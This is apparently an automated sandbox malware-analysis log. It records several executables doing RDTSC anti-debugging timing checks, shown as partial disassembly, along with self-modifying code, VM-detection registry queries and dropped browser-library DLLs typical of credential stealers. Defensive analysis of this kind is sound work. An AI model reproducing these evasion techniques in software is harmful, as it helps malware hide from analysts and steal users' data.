Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C7914 second address: 8C791A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C791A second address: 8C7934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79C0513876h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CB063 second address: 8CB067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CB4CE second address: 8CB4D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CB4D4 second address: 8CB549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F79C0CFE296h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edi, dword ptr [ebp+122D3D3Eh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F79C0CFE298h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F79C0CFE298h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f mov bx, dx 0x00000052 jng 00007F79C0CFE2A4h 0x00000058 pushad 0x00000059 mov edi, dword ptr [ebp+122D1D75h] 0x0000005f jl 00007F79C0CFE296h 0x00000065 popad 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b pop edi 0x0000006c rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C8BB3 second address: 8C8BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CC590 second address: 8CC5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0CFE29Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CC5A3 second address: 8CC5A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CC5A9 second address: 8CC5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CB6AA second address: 8CB76C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513876h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b add esi, dword ptr [ebp+122D3C22h] 0x00000011 mov eax, dword ptr [ebp+122D2DE5h] 0x00000017 popad 0x00000018 push dword ptr fs:[00000000h] 0x0000001f jno 00007F79C0513879h 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c call 00007F79C051386Dh 0x00000031 jmp 00007F79C0513879h 0x00000036 pop edi 0x00000037 mov eax, dword ptr [ebp+122D0539h] 0x0000003d pushad 0x0000003e mov edi, dword ptr [ebp+122D3290h] 0x00000044 sub al, FFFFFFBEh 0x00000047 popad 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007F79C0513868h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 nop 0x00000065 pushad 0x00000066 pushad 0x00000067 jmp 00007F79C051386Fh 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CD6E8 second address: 8CD6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CC740 second address: 8CC744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CE84B second address: 8CE903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push edi 0x00000009 call 00007F79C0CFE2A2h 0x0000000e mov bx, cx 0x00000011 pop edi 0x00000012 pop edi 0x00000013 jmp 00007F79C0CFE2A1h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F79C0CFE298h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 jmp 00007F79C0CFE2A3h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 add dword ptr [ebp+122D2C6Ch], eax 0x0000004b mov eax, dword ptr [ebp+122D0541h] 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007F79C0CFE298h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 0000001Bh 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b jl 00007F79C0CFE29Ch 0x00000071 and edi, 411B2733h 0x00000077 push FFFFFFFFh 0x00000079 mov dword ptr [ebp+122D1F61h], edi 0x0000007f nop 0x00000080 push eax 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D0796 second address: 8D07B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007F79C0513866h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jg 00007F79C0513868h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D07B0 second address: 8D07B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8CFA5C second address: 8CFA66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F79C0513866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D07B4 second address: 8D07B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D0976 second address: 8D097A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D097A second address: 8D0980 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D0980 second address: 8D09F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub bl, 00000061h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F79C0513868h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D2EA8h], edi 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov edi, edx 0x0000003d mov eax, dword ptr [ebp+122D058Dh] 0x00000043 xor ebx, dword ptr [ebp+122D3BDAh] 0x00000049 push FFFFFFFFh 0x0000004b or dword ptr [ebp+122D22A2h], eax 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 je 00007F79C0513866h 0x0000005b push eax 0x0000005c pop eax 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D27A4 second address: 8D27A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D18D4 second address: 8D18DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D18DA second address: 8D18DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D198B second address: 8D198F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D4920 second address: 8D4926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D49C4 second address: 8D49C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D58EC second address: 8D58F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D58F1 second address: 8D590E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F79C0513866h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79C051386Bh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D590E second address: 8D5912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D5912 second address: 8D5918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D5918 second address: 8D591E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D591E second address: 8D5922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D3ABB second address: 8D3AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D4B4B second address: 8D4B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D7BBA second address: 8D7BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0CFE2A6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D3AC1 second address: 8D3AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D4B4F second address: 8D4B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D3AC5 second address: 8D3ADC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79C0513866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pushad 0x0000000f js 00007F79C0513866h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D4B67 second address: 8D4BEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a mov ebx, 14F343EAh 0x0000000f pop edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr [ebp+122D1CA3h], ecx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 sub edi, 6D9AEF0Ah 0x0000002a jg 00007F79C0CFE29Ch 0x00000030 mov dword ptr [ebp+122D2DEBh], esi 0x00000036 mov eax, dword ptr [ebp+122D050Dh] 0x0000003c cmc 0x0000003d push FFFFFFFFh 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007F79C0CFE298h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 jne 00007F79C0CFE29Ch 0x0000005f nop 0x00000060 jmp 00007F79C0CFE29Fh 0x00000065 push eax 0x00000066 pushad 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D4BEB second address: 8D4BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D6BBD second address: 8D6BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D6BC1 second address: 8D6BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D6BC5 second address: 8D6BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jl 00007F79C0CFE296h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D9AA4 second address: 8D9B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0513870h 0x00000009 popad 0x0000000a nop 0x0000000b xor ebx, dword ptr [ebp+122D3C4Eh] 0x00000011 jmp 00007F79C0513874h 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D1DB6h] 0x0000001e push 00000000h 0x00000020 jbe 00007F79C051386Ch 0x00000026 mov dword ptr [ebp+1246F726h], ebx 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e jg 00007F79C051386Ch 0x00000034 pushad 0x00000035 push esi 0x00000036 pop esi 0x00000037 jnl 00007F79C0513866h 0x0000003d popad 0x0000003e popad 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8DAA74 second address: 8DAAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F79C0CFE296h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pop ebx 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D1EE2h], esi 0x0000001c push 00000000h 0x0000001e xor bx, B08Ch 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 mov eax, dword ptr [ebp+122D3A83h] 0x0000002c mov ecx, dword ptr [ebp+122D3D52h] 0x00000032 popad 0x00000033 mov edi, dword ptr [ebp+122D322Bh] 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F79C0CFE2A3h 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8D9C17 second address: 8D9CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jc 00007F79C0513876h 0x0000000d jmp 00007F79C0513870h 0x00000012 nop 0x00000013 sub di, 7D35h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov ebx, dword ptr [ebp+122D3C7Ah] 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c movzx ebx, dx 0x0000002f mov eax, dword ptr [ebp+122D0041h] 0x00000035 ja 00007F79C0513874h 0x0000003b push FFFFFFFFh 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007F79C0513868h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 mov dword ptr [ebp+122D1F08h], eax 0x0000005d movsx edi, ax 0x00000060 push eax 0x00000061 pushad 0x00000062 jmp 00007F79C0513876h 0x00000067 push eax 0x00000068 push edx 0x00000069 push edx 0x0000006a pop edx 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8DACF2 second address: 8DACF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8E0E60 second address: 8E0E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F79C0513866h 0x0000000c jp 00007F79C0513866h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8E0E73 second address: 8E0EA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79C0CFE2A2h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jno 00007F79C0CFE29Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8E0EA2 second address: 8E0EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 887EEB second address: 887EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 887EF1 second address: 887EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Special instruction interceptor: First address: 3F8AC2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Special instruction interceptor: First address: 3F8BDA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Special instruction interceptor: First address: 592ACB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Special instruction interceptor: First address: 3F61E2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Special instruction interceptor: First address: 5BAF78 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Special instruction interceptor: First address: 59BB87 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Special instruction interceptor: First address: 624718 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Special instruction interceptor: First address: 71DF12 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Special instruction interceptor: First address: 71DE84 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Special instruction interceptor: First address: 8C9706 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Special instruction interceptor: First address: 94CEC4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Special instruction interceptor: First address: E6FF92 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Special instruction interceptor: First address: 101EAB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Special instruction interceptor: First address: 7223EC instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Special instruction interceptor: First address: 2BC29A instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Special instruction interceptor: First address: 2BC6E1 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Special instruction interceptor: First address: 11EBFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 105C29A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 105C6E1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: EBEBFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Memory allocated: 4D80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Memory allocated: 4F70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Memory allocated: 6F70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_0088C4EB rdtsc 3_2_0088C4EB
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Code function: 3_2_008A2199 sidt fword ptr [esp-02h] 3_2_008A2199
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\nss3[1].dll Jump to dropped file
